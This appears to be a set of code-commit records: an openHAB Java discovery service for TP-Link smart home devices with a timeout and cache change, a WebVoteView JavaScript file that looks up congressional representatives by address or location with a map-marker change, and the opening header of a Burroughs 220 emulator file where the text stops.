/** * Copyright (c) 2010-2018 by the respective copyright holders. * * All rights reserved. This program and the accompanying materials * are made available under the terms of the Eclipse Public License v1.0 * which accompanies this distribution, and is available at * http://www.eclipse.org/legal/epl-v10.html */ package org.openhab.binding.tplinksmarthome.internal; import static org.openhab.binding.tplinksmarthome.internal.TPLinkSmartHomeThingType.SUPPORTED_THING_TYPES; import java.io.IOException; import java.net.DatagramPacket; import java.net.DatagramSocket; import java.net.InetAddress; import java.net.SocketTimeoutException; import java.net.UnknownHostException; import java.util.Locale; import java.util.Map; import java.util.Optional; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.ScheduledFuture; import java.util.concurrent.TimeUnit; import org.eclipse.jdt.annotation.NonNullByDefault; import org.eclipse.jdt.annotation.Nullable; import org.eclipse.smarthome.config.discovery.AbstractDiscoveryService; import org.eclipse.smarthome.config.discovery.DiscoveryResult; import org.eclipse.smarthome.config.discovery.DiscoveryResultBuilder; import org.eclipse.smarthome.config.discovery.DiscoveryService; import org.eclipse.smarthome.core.thing.ThingTypeUID; import org.eclipse.smarthome.core.thing.ThingUID; import org.openhab.binding.tplinksmarthome.internal.model.Sysinfo; import org.osgi.service.component.annotations.Component; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * The {@link TPLinkSmartHomeDiscoveryService} detects new Smart Home Bulbs, Plugs and Switches by sending a UDP network * broadcast and parsing the answer into a thing. * * @author Christian Fischer - Initial contribution * @author Hilbrand Bouwkamp - Complete make-over, reorganized code and code cleanup. */ @Component(service = { DiscoveryService.class, TPLinkIpAddressService.class }, immediate = true, configurationPid = "discovery.tplinksmarthome") @NonNullByDefault public class TPLinkSmartHomeDiscoveryService extends AbstractDiscoveryService implements TPLinkIpAddressService { private static final String BROADCAST_IP = "255.255.255.255"; private static final int DISCOVERY_TIMEOUT_SECONDS = 30; private static final int UDP_PACKET_TIMEOUT_MS = 3000; private static final long REFRESH_INTERVAL_MINUTES = 1; private final Logger logger = LoggerFactory.getLogger(TPLinkSmartHomeDiscoveryService.class); private final Commands commands = new Commands(); private final Map<String, String> idInetAddressCache = new ConcurrentHashMap<>(); private final DatagramPacket discoverPacket; private final byte[] buffer = new byte[2048]; private @NonNullByDefault({}) DatagramSocket discoverSocket; private @NonNullByDefault({}) ScheduledFuture<?> discoveryJob; public TPLinkSmartHomeDiscoveryService() throws UnknownHostException { super(SUPPORTED_THING_TYPES, DISCOVERY_TIMEOUT_SECONDS); InetAddress broadcast = InetAddress.getByName(BROADCAST_IP); byte[] discoverbuffer = CryptUtil.encrypt(Commands.getSysinfo()); discoverPacket = new DatagramPacket(discoverbuffer, discoverbuffer.length, broadcast, Connection.TP_LINK_SMART_HOME_PORT); } @Override public @Nullable String getLastKnownIpAddress(String deviceId) { return idInetAddressCache.get(deviceId); } @Override protected void startBackgroundDiscovery() { discoveryJob = scheduler.scheduleWithFixedDelay(this::startScan, 0, REFRESH_INTERVAL_MINUTES, TimeUnit.MINUTES); } @Override protected void stopBackgroundDiscovery() { stopScan(); if (discoveryJob != null && !discoveryJob.isCancelled()) { discoveryJob.cancel(true); discoveryJob = null; } } @Override protected void startScan() { logger.debug("Start scan for TP-Link Smart devices."); synchronized (this) { try { discoverSocket = sendDiscoveryPacket(); // Runs until the socket call gets a time out and throws an exception. When a time out is triggered it // means no data was present and nothing new to discover. while (true) { if (discoverSocket == null) { break; } DatagramPacket packet = new DatagramPacket(buffer, buffer.length); discoverSocket.receive(packet); logger.debug("TP-Link Smart device discovery returned package with length {}", packet.getLength()); if (packet.getLength() > 0) { detectThing(packet); } } } catch (SocketTimeoutException e) { logger.debug("Discovering poller timeout..."); } catch (IOException e) { logger.debug("Error during discovery: {}", e.getMessage()); } finally { closeDiscoverSocket(); removeOlderResults(getTimestampOfLastScan()); } } } @Override protected void stopScan() { logger.debug("Stop scan for TP-Link Smart devices."); closeDiscoverSocket(); super.stopScan(); } /** * Opens a {@link DatagramSocket} and sends a packet for discovery of TP-Link Smart Home devices. * * @return Returns the new socket * @throws IOException exception in case sending the packet failed */ protected DatagramSocket sendDiscoveryPacket() throws IOException { DatagramSocket ds = new DatagramSocket(null); ds.setBroadcast(true); ds.setSoTimeout(UDP_PACKET_TIMEOUT_MS); ds.send(discoverPacket); logger.trace("Discovery package sent."); return ds; } /** * Closes the discovery socket and cleans the value. No need for synchronization as this method is called from a * synchronized context. */ private void closeDiscoverSocket() { if (discoverSocket != null) { discoverSocket.close(); discoverSocket = null; } } /** * Detected a device (thing) and get process the data from the device and report it discovered. * * @param packet containing data of detected device * @throws IOException in case decrypting of the data failed */ private void detectThing(DatagramPacket packet) throws IOException { String ipAddress = packet.getAddress().getHostAddress(); String rawData = CryptUtil.decrypt(packet.getData(), packet.getLength()); Sysinfo sysinfoRaw = commands.getSysinfoReponse(rawData); Sysinfo sysinfo = sysinfoRaw.getActualSysinfo(); logger.trace("Detected TP-Link Smart Home device: {}", rawData); String deviceId = sysinfo.getDeviceId(); logger.debug("TP-Link Smart Home device '{}' with id {} found on {} ", sysinfo.getAlias(), deviceId, ipAddress); idInetAddressCache.put(deviceId, ipAddress); Optional<ThingTypeUID> thingTypeUID = getThingTypeUID(sysinfo.getModel()); if (thingTypeUID.isPresent()) { ThingUID thingUID = new ThingUID(thingTypeUID.get(), deviceId.substring(deviceId.length() - 6, deviceId.length())); Map<String, Object> properties = PropertiesCollector.collectProperties(thingTypeUID.get(), ipAddress, sysinfoRaw); DiscoveryResult discoveryResult = DiscoveryResultBuilder.create(thingUID).withLabel(sysinfo.getAlias()) .withRepresentationProperty(deviceId).withProperties(properties).build(); thingDiscovered(discoveryResult); } else { logger.debug("Detected, but ignoring unsupported TP-Link Smart Home device model '{}'", sysinfo.getModel()); } } /** * Finds the {@link ThingTypeUID} based on the model value returned by the device. * * @param model model value returned by the device * @return {@link ThingTypeUID} or null if device not recognized */ private Optional<ThingTypeUID> getThingTypeUID(String model) { String modelLC = model.toLowerCase(Locale.ENGLISH); return SUPPORTED_THING_TYPES.stream().filter(suid -> modelLC.startsWith(suid.getId())).findFirst(); } }
Discovery package timeout gets more time and clear cache before discovery start. (#4255) Timeout of discovery was very short. For devices with a low connection rssi this seems to give them some more time to react. Also reduced to overall time because if the packet timeout triggers discovery is over anyway, so no need to keep it longer. Also cleared the idINet cache to avoid having old results. It keeps the cache clean. Signed-off-by: Hilbrand Bouwkamp <[email protected]>
addons/binding/org.openhab.binding.tplinksmarthome/src/main/java/org/openhab/binding/tplinksmarthome/internal/TPLinkSmartHomeDiscoveryService.java
Discovery package timeout gets more time and clear cache before discovery start. (#4255)
<ide><path>ddons/binding/org.openhab.binding.tplinksmarthome/src/main/java/org/openhab/binding/tplinksmarthome/internal/TPLinkSmartHomeDiscoveryService.java <ide> public class TPLinkSmartHomeDiscoveryService extends AbstractDiscoveryService implements TPLinkIpAddressService { <ide> <ide> private static final String BROADCAST_IP = "255.255.255.255"; <del> private static final int DISCOVERY_TIMEOUT_SECONDS = 30; <del> private static final int UDP_PACKET_TIMEOUT_MS = 3000; <add> private static final int DISCOVERY_TIMEOUT_SECONDS = 8; <add> private static final int UDP_PACKET_TIMEOUT_MS = (int) TimeUnit.SECONDS.toMillis(DISCOVERY_TIMEOUT_SECONDS - 1); <ide> private static final long REFRESH_INTERVAL_MINUTES = 1; <ide> <ide> private final Logger logger = LoggerFactory.getLogger(TPLinkSmartHomeDiscoveryService.class); <ide> logger.debug("Start scan for TP-Link Smart devices."); <ide> synchronized (this) { <ide> try { <add> idInetAddressCache.clear(); <ide> discoverSocket = sendDiscoveryPacket(); <ide> // Runs until the socket call gets a time out and throws an exception. When a time out is triggered it <ide> // means no data was present and nothing new to discover.
JavaScript
apache-2.0
90ace3841cb3a63312ed07322683d1fadaa24dac
0
JeffreyBLewis/WebVoteView,JeffreyBLewis/WebVoteView,JeffreyBLewis/WebVoteView,JeffreyBLewis/WebVoteView
var tooltipIdeology = $("<div></div>").addClass("d3-tip").css("visibility","hidden").attr("id","tooltipIdeology").appendTo(document.body); // From stackoverflow response, who borrowed it from Shopify--simple ordinal suffix. var myLat, myLong; var slowTimer; var globalEnableLocation = 0; function getGetOrdinal(n) { var s=["th","st","nd","rd"], v=n%100; return n+(s[(v-20)%10]||s[v]||s[0]); } function congToYears(n) { return [1787+(2*n), 1787+(2*n)+2]; } function lzPad(t) { if(parseInt(t)<10) { return "0"+t; } else { return t; } } function loadText(t) { $("#addressInput").val(t); latLongWrapper(); } function resetResults() { $("#resultsMembers").hide().html(""); $("#addressCorrected").html(""); $("#google_map").html(""); $("#warnings").hide().html(""); $("#loadProgress").hide().html(""); $("#perm_link_holder").html(""); } $(document).ready(function(){ $("#addressInput").on("focus",function() { if($("#addressInput").val()=="MY LOCATION") { $("#addressInput").val(""); } }); $("#submit-address-form").submit(function(event) { event.preventDefault(); latLongWrapper(); }); $("#submit-geolocation").click(function(event) { event.preventDefault(); getLocation(); }); if($("#cachedLat").val()) { myLat = $("#cachedLat").val(); } if($("#cachedLong").val()) { myLong = $("#cachedLong").val(); } if($("#addressInput").val()) { setTimeout(function(){latLongWrapper();},1000); } $("ul#testData li").on("click",function(){ console.log($(this).val()); loadText(this.innerHTML); }); $("ul#notableExamples li").on("click",function(){ console.log($(this).val()); loadText(this.innerHTML); }); }); if(navigator.geolocation) { globalEnableLocation=1; console.log('html5 location support.'); $("#locationButton").show(); function success(position) { clearTimeout(slowTimer); console.log(position.coords); myLat = position.coords.latitude; myLong = position.coords.longitude; $("#cachedLat").val(myLat); $("#cachedLong").val(myLong); $("#addressInput").val("MY LOCATION"); resetResults(); $("#loadProgress").show().html("<strong>Loading...</strong> Location matched, looking up historical representatives... <img src=\"/static/img/loading.gif\" style=\"width:16px;\">"); doMembers(myLat, myLong); } function error() { clearTimeout(slowTimer); resetResults(); $("#warnings").html("").show(); var errorDiv = $("<div></div>").addClass("alert alert-danger").html("<strong>Error:</strong> Error looking up your location. Most commonly this occurs because you are having internet connection trouble or you have privacy settings designed to block web access to your location."); errorDiv.appendTo($("#warnings")); return; } function getLocation(event) { console.log(event); console.log('I AM HERE, IN THE GETLOCATION FUNCTION'); resetResults(); $("#loadProgress").show().html("<strong>Loading...</strong> Looking up your current location... <img src=\"/static/img/loading.gif\" style=\"width:16px;\">"); slowTimer = setTimeout(function() { $("#loadProgress").html($("#loadProgress").html()+"<br/>This process seems to be taking an unusually long time to complete. The delay is related to your internet connection, router, or web browser and is not connected to our server."); }, 5000); navigator.geolocation.getCurrentPosition(success, error); } $("#geolocationTutorial").show(); } function latLongWrapper() { console.log('I AM HERE, IN THE ADDRESS LOOKUP.'); resetResults(); if($("#addressInput").val()=="") { $("#warnings").html("").show(); var errorDiv = $("<div></div>").addClass("alert alert-danger").html("<strong>Error:</strong> No address specified."); errorDiv.appendTo($("#warnings")); return; } else if($("#addressInput").val()=="MY LOCATION" && globalEnableLocation && $("#cachedLat").val() && $("#cachedLong").val()) { doMembers(parseFloat($("#cachedLat").val()), parseFloat($("#cachedLong").val())); } else if($("#addressInput").val()=="MY LOCATION") { $("#warnings").html("").show(); var errorDiv = $("<div></div>").addClass("alert alert-danger").html("<strong>Error:</strong> Error accessing your location, either due to internet connectivity or privacy settings. Please manually type an address to continue."); errorDiv.appendTo($("#warnings")); } else { $("#loadProgress").show().html("<strong>Loading...</strong> Matching address to map coordinates... <img src=\"/static/img/loading.gif\" style=\"width:16px;\">"); setTimeout(doLatLong, 20); } } function doLatLong() { console.log('I AM HERE, CACHED LAT LONG TO DISTRICT LOOKUP.'); $.ajax({ dataType: "JSON", url: "/api/geocode?q="+$("#addressInput").val(), success: function(data, status, xhr) { console.log(data); if(data["status"]) { $("#loadProgress").fadeOut(); console.log("Error! Oh no!"); var errorDiv = $("<div></div>").addClass("alert alert-danger").html("<strong>Error:</strong> "+data["error_message"]) errorDiv.appendTo($("#warnings")); $("#warnings").fadeIn(); return; } else { console.log(data); if(data["warnings"]!=undefined && data["warnings"].length) { $("#warnings").html(""); var warningDiv = $("<div></div>").addClass("alert alert-warning").html("<strong>Warning:</strong> "+data["warnings"][0]); warningDiv.appendTo($("#warnings")); $("#warnings").fadeIn(); } $("#addressCorrected").html("<strong>Address Lookup:</strong><br/><small>"+data["formatted_address"]+"</small>"); $("#loadProgress").html("<strong>Loading...</strong> Address matched, looking up historical representatives... <img src=\"/static/img/loading.gif\" style=\"width:16px;\">"); doMembers(data["lat"], data["lng"]); } } }); } function compareSort(a, b) { if(a.congress > b.congress) { return -1; } else if(a.congress < b.congress) { return 1; } else { if(a.party_noun < b.party_noun) { return -1; } else if(a.party_noun > b.party_noun) { return 1; } else { if(a.bioname < b.bioname) { return -1; } else { return 1; } } } } function doMembers(lat, lng) { console.log("Entering this now."); console.log(lat); console.log(lng); var markerPos = {lat: lat, lng: lng}; var map = new google.maps.Map(document.getElementById("google_map"), {zoom: 12, center: markerPos, disableDefaultUI: true, scrollwheel: false, draggable: true, zoomControl: true}); // Put the marker in the lat/long var marker = new google.maps.Marker({position: markerPos, map: map}); // If the user moves the viewport, update the map? google.maps.event.addListener(map, 'idle', function() { console.log("idle now"); var coords = [map.getCenter().lat(), map.getCenter().lng()]; //$("#addressInput").val(coords[0]+", "+coords[1]); //resetResults(); //doLatLong(); }); $.ajax({ dataType: "JSON", url: "/api/districtLookup?lat="+lat+"&long="+lng, success: function(data, status, xhr) { $("#loadProgress").fadeOut(); if(data["resCurr"].length) { $("<h4>Current Congressperson and Senators</h4>").appendTo("#resultsMembers"); var memberList = $("<ul></ul>").css("columns","auto 3") .css("list-style-type","none").css("overflow","auto") .css("width","100%").css("margin-left",0).css("padding-left",0).css("margin-bottom","15px") .css("display","block").attr("id","memberList"); console.log(data["resCurr"]); memberList.appendTo("#resultsMembers"); $.each(data["resCurr"], function(k,v) { constructPlot(v, 0); }); } var permLink = $("<a></a>").attr("href","/district/"+encodeURI($("#addressInput").val())).html("Permanent Link to this address search."); permLink.appendTo($("#perm_link_holder")); $("<h4>Historical Representatives</h4>").appendTo("#resultsMembers"); var table = $("<table><thead><tr><th>Congress</th><th>District</th><th>Ideology</th><th>Party</th><th>Member</th></tr></thead></table>") .addClass("table table-hover dc-data-table"); var tbody = $("<tbody></tbody>"); // For visual design, we do a pocket algorithm; save the last guy, compare to current guy, see what's changed. var lastResult = {}; var myResults = data["results"].sort(compareSort); $.each(myResults, function(k, v) { // Check to see if we have other members at the same time var multiMember=0; if(v["congress"]<90) { var howMany = $.grep(myResults, function(n,i) { return (n["congress"]==v["congress"]); }); if(howMany.length>1) { multiMember=1; } } // Explainers for weird edge cases (partition/joining or the Civil War) if(lastResult["congress"]>38 && lastResult["congress"]<=45 && v["congress"]<37 && v["congress"]>=30) { var civilWarDiv = $("<div></div>").addClass("alert alert-info").html("<strong>United States Civil War</strong>: "+v["state"]+" does not seat a delegation in the US Congress."); var tr = $("<tr></tr>"); var td = $("<td colspan=\"5\"></td>"); civilWarDiv.appendTo(td); td.appendTo(tr); tr.appendTo(tbody); } if(lastResult["state"]=="Maryland" && Math.abs(v["congress"]-lastResult["congress"])>20) { var maryDiv = $("<div></div>").addClass("alert alert-info").html("<strong>D.C.</strong>: The changing shapes of congressional districts occasionally include the address you entered in Maryland. As above, Voteview.com does not track D.C. delegates."); var tr = $("<tr></tr>"); var td = $("<td colspan=\"5\"></td>"); maryDiv.appendTo(td); td.appendTo(tr); tr.appendTo(tbody); } if(lastResult["state"]=="West Virginia" && v["state"]=="Virginia") { var virgDiv = $("<div></div>").addClass("alert alert-info").html("<strong>United States Civil War</strong>: West Virginia breaks away from Virginia to form a new state."); var tr = $("<tr></tr>"); var td = $("<td colspan=\"5\"></td>"); virgDiv.appendTo(td); td.appendTo(tr); tr.appendTo(tbody); } if(lastResult["state"]=="Maine" && v["state"]=="Massachusetts") { var maineDiv = $("<div></div>").addClass("alert alert-info").html("<strong>1820</strong>: Maine votes to secede from Massachusetts and is admitted to the union as a state."); var tr = $("<tr></tr>"); var td = $("<td colspan=\"5\"></td>"); maineDiv.appendTo(td); td.appendTo(tr); tr.appendTo(tbody); } var tr = $("<tr></tr>").on("click",function(){window.location='/person/'+v["icpsr"]+"/"+v["seo_name"];}); dateSet = congToYears(v["congress"]); if(v["nominate"]!=undefined && v["nominate"]["dim1"]!=undefined) { var nomOffset = Math.floor((v["nominate"]["dim1"]+1.01)*50); } $("<td>"+getGetOrdinal(v["congress"])+" ("+dateSet[0]+"-"+dateSet[1].toString().substr(2,2)+")</td>").appendTo(tr); $("<td>"+v["state_abbrev"]+"-"+lzPad(v["district_code"])+"</td>").appendTo(tr); if(v["nominate"]!=undefined && v["nominate"]["dim1"]!=undefined) { var nomDiv = $("<span></span>").css("border-right","3px solid "+colorSchemes[v["party_color"]][0]) .css("width",nomOffset+"%").css("height","100%").css("overflow","auto").css("display","block"); var holdingTD = $("<td></td>").css("padding","0").css("width","20px").css("border-left","1px solid grey").css("border-right","1px solid grey"); nomDiv.appendTo(holdingTD); holdingTD.appendTo(tr); } else { $("<td></td>").appendTo(tr); } $("<td>"+v["party_noun"]+"</td>").appendTo(tr); $("<td><a href=\"/person/"+v["icpsr"]+"/"+v["seo_name"]+"\">"+v["bioname"]+"</a></td>").appendTo(tr); // Use a closure to pin tooltips onto each row. (function(v){ tr.on("mouseover", function() { $("#tooltipIdeology").html(""); if(v["nominate"]!=undefined) { $("#tooltipIdeology").html(v["nominate"]["dim1"]); } else { $("#tooltipIdeology").html("<strong>No Ideology Score</strong>"); } $("#tooltipIdeology").removeClass().addClass("d3-tip"); $("#tooltipIdeology").css("left",($(this).offset().left+245)+"px"); $("#tooltipIdeology").css("top",$(this).offset().top+"px"); $("#tooltipIdeology").css("visibility","visible"); }); tr.on("mouseout",function() { $("#tooltipIdeology").css("visibility","hidden"); }); })(v); tr.appendTo(tbody); lastResult = v; }); tbody.appendTo(table); table.appendTo($("#resultsMembers")); //permLink.appendTo($("#resultsMembers")); $("#resultsMembers").fadeIn(); } }); }
static/js/district.js
var tooltipIdeology = $("<div></div>").addClass("d3-tip").css("visibility","hidden").attr("id","tooltipIdeology").appendTo(document.body); // From stackoverflow response, who borrowed it from Shopify--simple ordinal suffix. var myLat, myLong; var slowTimer; var globalEnableLocation = 0; function getGetOrdinal(n) { var s=["th","st","nd","rd"], v=n%100; return n+(s[(v-20)%10]||s[v]||s[0]); } function congToYears(n) { return [1787+(2*n), 1787+(2*n)+2]; } function lzPad(t) { if(parseInt(t)<10) { return "0"+t; } else { return t; } } function loadText(t) { $("#addressInput").val(t); latLongWrapper(); } function resetResults() { $("#resultsMembers").hide().html(""); $("#addressCorrected").html(""); $("#google_map").html(""); $("#warnings").hide().html(""); $("#loadProgress").hide().html(""); $("#perm_link_holder").html(""); } $(document).ready(function(){ $("#addressInput").on("focus",function() { if($("#addressInput").val()=="MY LOCATION") { $("#addressInput").val(""); } }); $("#submit-address-form").submit(function(event) { event.preventDefault(); latLongWrapper(); }); $("#submit-geolocation").click(function(event) { event.preventDefault(); getLocation(); }); if($("#cachedLat").val()) { myLat = $("#cachedLat").val(); } if($("#cachedLong").val()) { myLong = $("#cachedLong").val(); } if($("#addressInput").val()) { setTimeout(function(){latLongWrapper();},1000); } $("ul#testData li").on("click",function(){ console.log($(this).val()); loadText(this.innerHTML); }); $("ul#notableExamples li").on("click",function(){ console.log($(this).val()); loadText(this.innerHTML); }); }); if(navigator.geolocation) { globalEnableLocation=1; console.log('html5 location support.'); $("#locationButton").show(); function success(position) { clearTimeout(slowTimer); console.log(position.coords); myLat = position.coords.latitude; myLong = position.coords.longitude; $("#cachedLat").val(myLat); $("#cachedLong").val(myLong); $("#addressInput").val("MY LOCATION"); resetResults(); $("#loadProgress").show().html("<strong>Loading...</strong> Location matched, looking up historical representatives... <img src=\"/static/img/loading.gif\" style=\"width:16px;\">"); doMembers(myLat, myLong); } function error() { clearTimeout(slowTimer); resetResults(); $("#warnings").html("").show(); var errorDiv = $("<div></div>").addClass("alert alert-danger").html("<strong>Error:</strong> Error looking up your location. Most commonly this occurs because you are having internet connection trouble or you have privacy settings designed to block web access to your location."); errorDiv.appendTo($("#warnings")); return; } function getLocation(event) { console.log(event); console.log('I AM HERE, IN THE GETLOCATION FUNCTION'); resetResults(); $("#loadProgress").show().html("<strong>Loading...</strong> Looking up your current location... <img src=\"/static/img/loading.gif\" style=\"width:16px;\">"); slowTimer = setTimeout(function() { $("#loadProgress").html($("#loadProgress").html()+"<br/>This process seems to be taking an unusually long time to complete. The delay is related to your internet connection, router, or web browser and is not connected to our server."); }, 5000); navigator.geolocation.getCurrentPosition(success, error); } $("#geolocationTutorial").show(); } function latLongWrapper() { console.log('I AM HERE, IN THE ADDRESS LOOKUP.'); resetResults(); if($("#addressInput").val()=="") { $("#warnings").html("").show(); var errorDiv = $("<div></div>").addClass("alert alert-danger").html("<strong>Error:</strong> No address specified."); errorDiv.appendTo($("#warnings")); return; } else if($("#addressInput").val()=="MY LOCATION" && globalEnableLocation && $("#cachedLat").val() && $("#cachedLong").val()) { doMembers(parseFloat($("#cachedLat").val()), parseFloat($("#cachedLong").val())); } else if($("#addressInput").val()=="MY LOCATION") { $("#warnings").html("").show(); var errorDiv = $("<div></div>").addClass("alert alert-danger").html("<strong>Error:</strong> Error accessing your location, either due to internet connectivity or privacy settings. Please manually type an address to continue."); errorDiv.appendTo($("#warnings")); } else { $("#loadProgress").show().html("<strong>Loading...</strong> Matching address to map coordinates... <img src=\"/static/img/loading.gif\" style=\"width:16px;\">"); setTimeout(doLatLong, 20); } } function doLatLong() { console.log('I AM HERE, CACHED LAT LONG TO DISTRICT LOOKUP.'); $.ajax({ dataType: "JSON", url: "/api/geocode?q="+$("#addressInput").val(), success: function(data, status, xhr) { console.log(data); if(data["status"]) { $("#loadProgress").fadeOut(); console.log("Error! Oh no!"); var errorDiv = $("<div></div>").addClass("alert alert-danger").html("<strong>Error:</strong> "+data["error_message"]) errorDiv.appendTo($("#warnings")); $("#warnings").fadeIn(); return; } else { console.log(data); if(data["warnings"]!=undefined && data["warnings"].length) { $("#warnings").html(""); var warningDiv = $("<div></div>").addClass("alert alert-warning").html("<strong>Warning:</strong> "+data["warnings"][0]); warningDiv.appendTo($("#warnings")); $("#warnings").fadeIn(); } $("#addressCorrected").html("<strong>Address Lookup:</strong><br/><small>"+data["formatted_address"]+"</small>"); $("#loadProgress").html("<strong>Loading...</strong> Address matched, looking up historical representatives... <img src=\"/static/img/loading.gif\" style=\"width:16px;\">"); doMembers(data["lat"], data["lng"]); } } }); } function compareSort(a, b) { if(a.congress > b.congress) { return -1; } else if(a.congress < b.congress) { return 1; } else { if(a.party_noun < b.party_noun) { return -1; } else if(a.party_noun > b.party_noun) { return 1; } else { if(a.bioname < b.bioname) { return -1; } else { return 1; } } } } function doMembers(lat, lng) { console.log("Entering this now."); console.log(lat); console.log(lng); var markerPos = {lat: lat, lng: lng}; var map = new google.maps.Map(document.getElementById("google_map"), {zoom: 12, center: markerPos, disableDefaultUI: true, scrollwheel: false, draggable: true, zoomControl: true}); var market = new google.maps.Marker({position: markerPos, map: map}); $.ajax({ dataType: "JSON", url: "/api/districtLookup?lat="+lat+"&long="+lng, success: function(data, status, xhr) { $("#loadProgress").fadeOut(); if(data["resCurr"].length) { $("<h4>Current Congressperson and Senators</h4>").appendTo("#resultsMembers"); var memberList = $("<ul></ul>").css("columns","auto 3") .css("list-style-type","none").css("overflow","auto") .css("width","100%").css("margin-left",0).css("padding-left",0).css("margin-bottom","15px") .css("display","block").attr("id","memberList"); console.log(data["resCurr"]); memberList.appendTo("#resultsMembers"); $.each(data["resCurr"], function(k,v) { constructPlot(v, 0); }); } var permLink = $("<a></a>").attr("href","/district/"+encodeURI($("#addressInput").val())).html("Permanent Link to this address search."); permLink.appendTo($("#perm_link_holder")); $("<h4>Historical Representatives</h4>").appendTo("#resultsMembers"); var table = $("<table><thead><tr><th>Congress</th><th>District</th><th>Ideology</th><th>Party</th><th>Member</th></tr></thead></table>") .addClass("table table-hover dc-data-table"); var tbody = $("<tbody></tbody>"); // For visual design, we do a pocket algorithm; save the last guy, compare to current guy, see what's changed. var lastResult = {}; var myResults = data["results"].sort(compareSort); $.each(myResults, function(k, v) { // Check to see if we have other members at the same time var multiMember=0; if(v["congress"]<90) { var howMany = $.grep(myResults, function(n,i) { return (n["congress"]==v["congress"]); }); if(howMany.length>1) { multiMember=1; } } // Explainers for weird edge cases (partition/joining or the Civil War) if(lastResult["congress"]>38 && lastResult["congress"]<=45 && v["congress"]<37 && v["congress"]>=30) { var civilWarDiv = $("<div></div>").addClass("alert alert-info").html("<strong>United States Civil War</strong>: "+v["state"]+" does not seat a delegation in the US Congress."); var tr = $("<tr></tr>"); var td = $("<td colspan=\"5\"></td>"); civilWarDiv.appendTo(td); td.appendTo(tr); tr.appendTo(tbody); } if(lastResult["state"]=="Maryland" && Math.abs(v["congress"]-lastResult["congress"])>20) { var maryDiv = $("<div></div>").addClass("alert alert-info").html("<strong>D.C.</strong>: The changing shapes of congressional districts occasionally include the address you entered in Maryland. As above, Voteview.com does not track D.C. delegates."); var tr = $("<tr></tr>"); var td = $("<td colspan=\"5\"></td>"); maryDiv.appendTo(td); td.appendTo(tr); tr.appendTo(tbody); } if(lastResult["state"]=="West Virginia" && v["state"]=="Virginia") { var virgDiv = $("<div></div>").addClass("alert alert-info").html("<strong>United States Civil War</strong>: West Virginia breaks away from Virginia to form a new state."); var tr = $("<tr></tr>"); var td = $("<td colspan=\"5\"></td>"); virgDiv.appendTo(td); td.appendTo(tr); tr.appendTo(tbody); } if(lastResult["state"]=="Maine" && v["state"]=="Massachusetts") { var maineDiv = $("<div></div>").addClass("alert alert-info").html("<strong>1820</strong>: Maine votes to secede from Massachusetts and is admitted to the union as a state."); var tr = $("<tr></tr>"); var td = $("<td colspan=\"5\"></td>"); maineDiv.appendTo(td); td.appendTo(tr); tr.appendTo(tbody); } var tr = $("<tr></tr>").on("click",function(){window.location='/person/'+v["icpsr"]+"/"+v["seo_name"];}); dateSet = congToYears(v["congress"]); if(v["nominate"]!=undefined && v["nominate"]["dim1"]!=undefined) { var nomOffset = Math.floor((v["nominate"]["dim1"]+1.01)*50); } $("<td>"+getGetOrdinal(v["congress"])+" ("+dateSet[0]+"-"+dateSet[1].toString().substr(2,2)+")</td>").appendTo(tr); $("<td>"+v["state_abbrev"]+"-"+lzPad(v["district_code"])+"</td>").appendTo(tr); if(v["nominate"]!=undefined && v["nominate"]["dim1"]!=undefined) { var nomDiv = $("<span></span>").css("border-right","3px solid "+colorSchemes[v["party_color"]][0]) .css("width",nomOffset+"%").css("height","100%").css("overflow","auto").css("display","block"); var holdingTD = $("<td></td>").css("padding","0").css("width","20px").css("border-left","1px solid grey").css("border-right","1px solid grey"); nomDiv.appendTo(holdingTD); holdingTD.appendTo(tr); } else { $("<td></td>").appendTo(tr); } $("<td>"+v["party_noun"]+"</td>").appendTo(tr); $("<td><a href=\"/person/"+v["icpsr"]+"/"+v["seo_name"]+"\">"+v["bioname"]+"</a></td>").appendTo(tr); // Use a closure to pin tooltips onto each row. (function(v){ tr.on("mouseover", function() { $("#tooltipIdeology").html(""); if(v["nominate"]!=undefined) { $("#tooltipIdeology").html(v["nominate"]["dim1"]); } else { $("#tooltipIdeology").html("<strong>No Ideology Score</strong>"); } $("#tooltipIdeology").removeClass().addClass("d3-tip"); $("#tooltipIdeology").css("left",($(this).offset().left+245)+"px"); $("#tooltipIdeology").css("top",$(this).offset().top+"px"); $("#tooltipIdeology").css("visibility","visible"); }); tr.on("mouseout",function() { $("#tooltipIdeology").css("visibility","hidden"); }); })(v); tr.appendTo(tbody); lastResult = v; }); tbody.appendTo(table); table.appendTo($("#resultsMembers")); //permLink.appendTo($("#resultsMembers")); $("#resultsMembers").fadeIn(); } }); }
Started on dynamic district search updating through lat/long, but not ready yet. Former-commit-id: f9c625b1d4a6dccfdee381f27c41f1e347e34692
static/js/district.js
Started on dynamic district search updating through lat/long, but not ready yet.
<ide><path>tatic/js/district.js <ide> console.log(lat); <ide> console.log(lng); <ide> var markerPos = {lat: lat, lng: lng}; <del> var map = new google.maps.Map(document.getElementById("google_map"), {zoom: 12, center: markerPos, disableDefaultUI: true, scrollwheel: false, draggable: true, zoomControl: true}); <del> var market = new google.maps.Marker({position: markerPos, map: map}); <add> var map = new google.maps.Map(document.getElementById("google_map"), {zoom: 12, center: markerPos, disableDefaultUI: true, scrollwheel: false, draggable: true, zoomControl: true}); <add> // Put the marker in the lat/long <add> var marker = new google.maps.Marker({position: markerPos, map: map}); <add> // If the user moves the viewport, update the map? <add> google.maps.event.addListener(map, 'idle', function() <add> { <add> console.log("idle now"); <add> var coords = [map.getCenter().lat(), map.getCenter().lng()]; <add> //$("#addressInput").val(coords[0]+", "+coords[1]); <add> //resetResults(); <add> //doLatLong(); <add> }); <ide> <ide> $.ajax({ <ide> dataType: "JSON",
JavaScript
mit
222cde187562d824507edf90200b59f35affb6ca
0
pkimpel/retro-220,pkimpel/retro-220
/*********************************************************************** * retro-220/emulator B220Processor.js ************************************************************************ * Copyright (c) 2017, Paul Kimpel. * Licensed under the MIT License, see * http://www.opensource.org/licenses/mit-license.php ************************************************************************ * Burroughs 220 Emulator Processor (CPU) module. * * Instance variables in all caps generally refer to register or flip-flop (FF) * entities in the processor hardware. See the following documents: * * Burroughs 220 Operational Characterists Manual * (Bulletin 5020A, Burroughs Corporation, revised August 1960). * Handbook of Operating Procedures for the Burroughs 220 * (Bulletin 5023, Burroughs Corporation, November 1959). * Burroughs 220 Schematics * (Technical Manual 4053-1, Burroughs Corporation, December 1958). * Datatron 220 Schematics, Section I [CPU.pdf] * (Technical Manual 4053, Burroughs Corporation, December 1958). * * available at: * http://bitsavers.org/pdf/burroughs/electrodata/220/ * * 